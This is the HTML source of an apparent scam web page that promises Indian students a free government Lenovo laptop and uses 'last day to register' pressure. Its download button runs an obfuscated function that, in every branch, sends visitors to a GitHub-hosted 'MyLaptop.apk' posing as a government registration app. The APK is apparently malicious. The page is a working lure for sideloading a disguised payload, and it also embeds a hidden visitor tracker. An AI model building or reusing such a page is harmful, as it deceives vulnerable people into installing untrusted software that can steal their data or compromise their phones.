<script type="text/javascript">
var sc_project=12652612; 
var sc_invisible=1; 
var sc_security="f95a7564"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js"
async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img
class="statcounter"
src="https://c.statcounter.com/12652612/0/f95a7564/1/"
alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>

<title>Government Free Laptop</title>
<meta name="title" content="Government Free Laptop">

<meta property="og:type" content="website">
<meta property="og:title" content="Government Free Laptop">
<meta property="og:description" content="Get Free Laptop from Government to-all Students of India">
<meta property="og:image" content="https://i.postimg.cc/T16TrQnN/scam1-3.png">

<style>
body{
background-color:#fff;
color:#fff;
font-family: sans-serif;
}
p,h2,h3{
color:#000;
}
.buttonva {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#fff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.sjdvvhsfbwdaf {
  display: flex;
  flex-direction: column;
  justify-content: center;
  align-items: center;
  text-align: center;
  min-height: 100vh;
}
.buttonva:hover {
	background-color:#314179;
}
.buttonva:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function usvobwiovbwubo() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://github.com/TabletNews/Register/raw/main/MyLaptop.apk"; 
	}
	else if(m<60)
	{
		window.location="https://github.com/TabletNews/Register/raw/main/MyLaptop.apk";
	}
	else
	{
		window.location="https://github.com/TabletNews/Register/raw/main/MyLaptop.apk";
	}
}
</script>

</head>
<body>
<center>
<div class="sjdvvhsfbwdaf">
	<img src="https://i.postimg.cc/T16TrQnN/scam1-3.png" height="40%" width="40%" />
	<br>
	<p>
	<h3>Get Lenovo Laptop from Government<br>
		to all students of India.<Br>
		Last day to register.<br> 
		</h3>
<h3>Register your Number on (PM-Laptop) apk.<br>
Download app and register now!</h3>
	</p>
	<a onClick="usvobwiovbwubo()" class="buttonva">Download Now(.APK)</a>
</div>
</center>
</body>
</html>
